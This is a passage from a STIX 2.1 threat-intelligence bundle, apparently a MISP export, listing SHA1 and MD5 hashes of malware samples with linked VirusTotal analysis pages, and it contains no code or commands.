"id": "url--58db8187-f938-4c4e-bdca-4e2d02de0b81",
|
|
"value": "https://www.virustotal.com/file/8a1d7fe6146ad99ee806586f217e067cd34d5bff7dd44d516e08576c22b1a382/analysis/1450362459/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8188-bedc-4309-894c-40a102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:32.000Z",
|
|
"modified": "2017-03-29T09:42:32.000Z",
|
|
"description": "sample - Xchecked via VT: 4aceb41286ad09a78a31006e65c374fd82f3f0682592cfa1b06a390b4450404a",
|
|
"pattern": "[file:hashes.SHA1 = 'bc936ea206c6ac63aca2e1b3eded345fd8985186']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8189-f668-4bc1-ac89-40fb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:33.000Z",
|
|
"modified": "2017-03-29T09:42:33.000Z",
|
|
"description": "sample - Xchecked via VT: 4aceb41286ad09a78a31006e65c374fd82f3f0682592cfa1b06a390b4450404a",
|
|
"pattern": "[file:hashes.MD5 = '1a481267cee617afcd7e8e7c06351ed0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db818a-8cd0-482c-b093-44e202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:34.000Z",
|
|
"modified": "2017-03-29T09:42:34.000Z",
|
|
"first_observed": "2017-03-29T09:42:34Z",
|
|
"last_observed": "2017-03-29T09:42:34Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db818a-8cd0-482c-b093-44e202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db818a-8cd0-482c-b093-44e202de0b81",
|
|
"value": "https://www.virustotal.com/file/4aceb41286ad09a78a31006e65c374fd82f3f0682592cfa1b06a390b4450404a/analysis/1455262159/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db818b-37ec-4b36-aa38-415602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:35.000Z",
|
|
"modified": "2017-03-29T09:42:35.000Z",
|
|
"description": "sample - Xchecked via VT: 0919a323113724b2e8734a3178996cedee88f827f7706423acf8407568a93bce",
|
|
"pattern": "[file:hashes.SHA1 = 'e9e6f0ea67d6c70e086cbdbfa78abeff02346d36']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db818c-3030-487a-b4ac-48db02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:36.000Z",
|
|
"modified": "2017-03-29T09:42:36.000Z",
|
|
"description": "sample - Xchecked via VT: 0919a323113724b2e8734a3178996cedee88f827f7706423acf8407568a93bce",
|
|
"pattern": "[file:hashes.MD5 = 'cfe1b057687603816a985f7bea0cf54c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db818c-d990-4031-8bfb-4fcf02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:36.000Z",
|
|
"modified": "2017-03-29T09:42:36.000Z",
|
|
"first_observed": "2017-03-29T09:42:36Z",
|
|
"last_observed": "2017-03-29T09:42:36Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db818c-d990-4031-8bfb-4fcf02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db818c-d990-4031-8bfb-4fcf02de0b81",
|
|
"value": "https://www.virustotal.com/file/0919a323113724b2e8734a3178996cedee88f827f7706423acf8407568a93bce/analysis/1450363912/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db818d-be94-469f-9d3b-447202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:37.000Z",
|
|
"modified": "2017-03-29T09:42:37.000Z",
|
|
"description": "sample - Xchecked via VT: a0ee38e7edac534827a1501bcc535ab7f604abfe654eb34b330ececc544cb084",
|
|
"pattern": "[file:hashes.SHA1 = '341f2fafd595b9637ff687b7939c678f247fbc27']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db818e-435c-4cbd-8ced-478002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:38.000Z",
|
|
"modified": "2017-03-29T09:42:38.000Z",
|
|
"description": "sample - Xchecked via VT: a0ee38e7edac534827a1501bcc535ab7f604abfe654eb34b330ececc544cb084",
|
|
"pattern": "[file:hashes.MD5 = '84d26901d5e87088aa5d11577ff01f48']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db818f-3318-4b83-a90e-4ddd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:39.000Z",
|
|
"modified": "2017-03-29T09:42:39.000Z",
|
|
"first_observed": "2017-03-29T09:42:39Z",
|
|
"last_observed": "2017-03-29T09:42:39Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db818f-3318-4b83-a90e-4ddd02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db818f-3318-4b83-a90e-4ddd02de0b81",
|
|
"value": "https://www.virustotal.com/file/a0ee38e7edac534827a1501bcc535ab7f604abfe654eb34b330ececc544cb084/analysis/1445821300/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8190-0020-4471-b498-469702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:40.000Z",
|
|
"modified": "2017-03-29T09:42:40.000Z",
|
|
"description": "sample - Xchecked via VT: f94b5803298a18b6ddc5eab202db6ae4e7199adf298ce16698e8053a36d5f934",
|
|
"pattern": "[file:hashes.SHA1 = '57ee556b63ca47fd6c66a8b02acb4a76dfa6816d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8191-3248-440b-89ac-422902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:41.000Z",
|
|
"modified": "2017-03-29T09:42:41.000Z",
|
|
"description": "sample - Xchecked via VT: f94b5803298a18b6ddc5eab202db6ae4e7199adf298ce16698e8053a36d5f934",
|
|
"pattern": "[file:hashes.MD5 = '72b04707e4539c0375945ba3bbd92c8d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8192-a3bc-43ed-9068-4f0f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:42.000Z",
|
|
"modified": "2017-03-29T09:42:42.000Z",
|
|
"first_observed": "2017-03-29T09:42:42Z",
|
|
"last_observed": "2017-03-29T09:42:42Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8192-a3bc-43ed-9068-4f0f02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8192-a3bc-43ed-9068-4f0f02de0b81",
|
|
"value": "https://www.virustotal.com/file/f94b5803298a18b6ddc5eab202db6ae4e7199adf298ce16698e8053a36d5f934/analysis/1489573640/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8193-1020-45ec-b344-488902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:43.000Z",
|
|
"modified": "2017-03-29T09:42:43.000Z",
|
|
"description": "sample - Xchecked via VT: dd3ada0bb17356592e13bae5961c0bb131e645d2c957f1f2047cc25528f60518",
|
|
"pattern": "[file:hashes.SHA1 = '670cdc43ecd071885695f10f11b106e84d64670a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8194-1ca0-40ba-b83d-468802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:44.000Z",
|
|
"modified": "2017-03-29T09:42:44.000Z",
|
|
"description": "sample - Xchecked via VT: dd3ada0bb17356592e13bae5961c0bb131e645d2c957f1f2047cc25528f60518",
|
|
"pattern": "[file:hashes.MD5 = '3a5616f3f6d408b17b3b0a93906a5cbf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8195-ec68-4ebf-9336-40be02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:45.000Z",
|
|
"modified": "2017-03-29T09:42:45.000Z",
|
|
"first_observed": "2017-03-29T09:42:45Z",
|
|
"last_observed": "2017-03-29T09:42:45Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8195-ec68-4ebf-9336-40be02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8195-ec68-4ebf-9336-40be02de0b81",
|
|
"value": "https://www.virustotal.com/file/dd3ada0bb17356592e13bae5961c0bb131e645d2c957f1f2047cc25528f60518/analysis/1482910292/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8196-d3dc-4e95-8e7b-416b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:46.000Z",
|
|
"modified": "2017-03-29T09:42:46.000Z",
|
|
"description": "sample - Xchecked via VT: 0dac129154c01867ca391da20227fdf7d7e3a9dd4cf42eac76833a051153794f",
|
|
"pattern": "[file:hashes.SHA1 = '8a25f9deea34bf7524c5b23b7af4a1a5f6fd6bc3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8197-60c8-4922-ad5e-411202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:47.000Z",
|
|
"modified": "2017-03-29T09:42:47.000Z",
|
|
"description": "sample - Xchecked via VT: 0dac129154c01867ca391da20227fdf7d7e3a9dd4cf42eac76833a051153794f",
|
|
"pattern": "[file:hashes.MD5 = '0c1e7125f78671a6c6685237d2a6afda']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8198-f3dc-4610-8a58-46b102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:48.000Z",
|
|
"modified": "2017-03-29T09:42:48.000Z",
|
|
"first_observed": "2017-03-29T09:42:48Z",
|
|
"last_observed": "2017-03-29T09:42:48Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8198-f3dc-4610-8a58-46b102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8198-f3dc-4610-8a58-46b102de0b81",
|
|
"value": "https://www.virustotal.com/file/0dac129154c01867ca391da20227fdf7d7e3a9dd4cf42eac76833a051153794f/analysis/1486600014/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8199-b0b4-486c-831d-4fc402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:49.000Z",
|
|
"modified": "2017-03-29T09:42:49.000Z",
|
|
"description": "sample - Xchecked via VT: daefdf3c053971d35eb4a7447cf74c0335066d557ddbe56f01611e8b9a38b512",
|
|
"pattern": "[file:hashes.SHA1 = 'a36fc40e8132b7ac1f6b4b1feabb4de714766f9e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db819a-edd8-4cab-820c-488d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:50.000Z",
|
|
"modified": "2017-03-29T09:42:50.000Z",
|
|
"description": "sample - Xchecked via VT: daefdf3c053971d35eb4a7447cf74c0335066d557ddbe56f01611e8b9a38b512",
|
|
"pattern": "[file:hashes.MD5 = '0a2798e4c7998c64a1e4d8909fb2df5e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db819b-9e50-4fad-92de-4d0d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:51.000Z",
|
|
"modified": "2017-03-29T09:42:51.000Z",
|
|
"first_observed": "2017-03-29T09:42:51Z",
|
|
"last_observed": "2017-03-29T09:42:51Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db819b-9e50-4fad-92de-4d0d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db819b-9e50-4fad-92de-4d0d02de0b81",
|
|
"value": "https://www.virustotal.com/file/daefdf3c053971d35eb4a7447cf74c0335066d557ddbe56f01611e8b9a38b512/analysis/1487781535/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db819c-adf0-4179-8587-40d602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:52.000Z",
|
|
"modified": "2017-03-29T09:42:52.000Z",
|
|
"description": "sample - Xchecked via VT: b3f371cc899440583095bac2817fba2ae2c7c3cac9c121d0798e03730589ad33",
|
|
"pattern": "[file:hashes.SHA1 = 'd72237072ac623e852b414a7ef15fde8e8cd84a6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:52Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db819c-8e38-4794-8319-4a7b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:52.000Z",
|
|
"modified": "2017-03-29T09:42:52.000Z",
|
|
"description": "sample - Xchecked via VT: b3f371cc899440583095bac2817fba2ae2c7c3cac9c121d0798e03730589ad33",
|
|
"pattern": "[file:hashes.MD5 = 'a2c3150d631d15e1c917eedda870438f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:52Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db819d-e1bc-4d27-80ee-4cab02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:53.000Z",
|
|
"modified": "2017-03-29T09:42:53.000Z",
|
|
"first_observed": "2017-03-29T09:42:53Z",
|
|
"last_observed": "2017-03-29T09:42:53Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db819d-e1bc-4d27-80ee-4cab02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db819d-e1bc-4d27-80ee-4cab02de0b81",
|
|
"value": "https://www.virustotal.com/file/b3f371cc899440583095bac2817fba2ae2c7c3cac9c121d0798e03730589ad33/analysis/1485525564/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db819e-ad28-4c1c-bcf0-4a2802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:54.000Z",
|
|
"modified": "2017-03-29T09:42:54.000Z",
|
|
"description": "sample - Xchecked via VT: de3aa81710f2580d3ac690c1f6d087a4672f29ccaa36e3901e4904056f83a48d",
|
|
"pattern": "[file:hashes.SHA1 = '7ba76691dc2203d97aa41ba9f3a248a04d86616b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db819f-63cc-410c-b69d-493f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:55.000Z",
|
|
"modified": "2017-03-29T09:42:55.000Z",
|
|
"description": "sample - Xchecked via VT: de3aa81710f2580d3ac690c1f6d087a4672f29ccaa36e3901e4904056f83a48d",
|
|
"pattern": "[file:hashes.MD5 = 'ade6122a18176691cfceed089febb614']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:55Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81a0-d998-4a69-8ccd-45a102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:56.000Z",
|
|
"modified": "2017-03-29T09:42:56.000Z",
|
|
"first_observed": "2017-03-29T09:42:56Z",
|
|
"last_observed": "2017-03-29T09:42:56Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81a0-d998-4a69-8ccd-45a102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81a0-d998-4a69-8ccd-45a102de0b81",
|
|
"value": "https://www.virustotal.com/file/de3aa81710f2580d3ac690c1f6d087a4672f29ccaa36e3901e4904056f83a48d/analysis/1424703788/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81a1-d614-41d5-8256-467c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:57.000Z",
|
|
"modified": "2017-03-29T09:42:57.000Z",
|
|
"description": "sample - Xchecked via VT: c8dee4c2212c7bf8eb9cd7635ff42526b17340fb198a801cdaa8d4ef72a3c1db",
|
|
"pattern": "[file:hashes.SHA1 = '663fe23e1b937f001903d81a03a8e1098965d676']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81a2-b7d8-4be1-8ee4-4aa502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:58.000Z",
|
|
"modified": "2017-03-29T09:42:58.000Z",
|
|
"description": "sample - Xchecked via VT: c8dee4c2212c7bf8eb9cd7635ff42526b17340fb198a801cdaa8d4ef72a3c1db",
|
|
"pattern": "[file:hashes.MD5 = 'a68933f3b285e7b4726e91f13d8fe2b0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81a3-327c-43c3-9ecd-46e102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:59.000Z",
|
|
"modified": "2017-03-29T09:42:59.000Z",
|
|
"first_observed": "2017-03-29T09:42:59Z",
|
|
"last_observed": "2017-03-29T09:42:59Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81a3-327c-43c3-9ecd-46e102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81a3-327c-43c3-9ecd-46e102de0b81",
|
|
